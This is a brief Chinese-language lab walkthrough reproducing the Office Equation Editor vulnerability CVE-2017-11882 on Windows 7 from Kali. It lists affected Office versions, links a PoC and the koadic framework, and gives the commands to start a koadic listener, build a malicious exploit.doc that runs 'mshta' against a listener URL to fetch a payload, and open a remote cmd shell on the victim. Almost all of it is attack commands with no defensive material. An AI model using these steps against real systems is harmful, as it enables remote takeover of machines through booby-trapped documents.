影响版本
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016
实验环境
office2016
Win7
kali
实验步骤
用msf一直复现不成功。。。。
这里通过koadic漏洞复现
下载koadic和poc
https://github.com/guokeya/tools/koadic-master.zip
https://github.com/guokeya/tools/CVE-2017-11882.zip
将koadic和Poc都拖入kali
./koadic运行
Set lhost 192.168.47.140
Set lport 1234
Run
这里返回了一个URL:http://192.168.47.140:1234/ZxMtV
下面就要用poc生成一个包含以上URL恶意代码的doc文件
python Command109b_CVE-2017-11882.py -c “mshta http://192.168.47.140:1234/ZxMtV” -o exploit.doc
拖入win7,运行下,成功返回shell
在koadic执行zombies 0 切换到项目
cmdshell 0 获取shell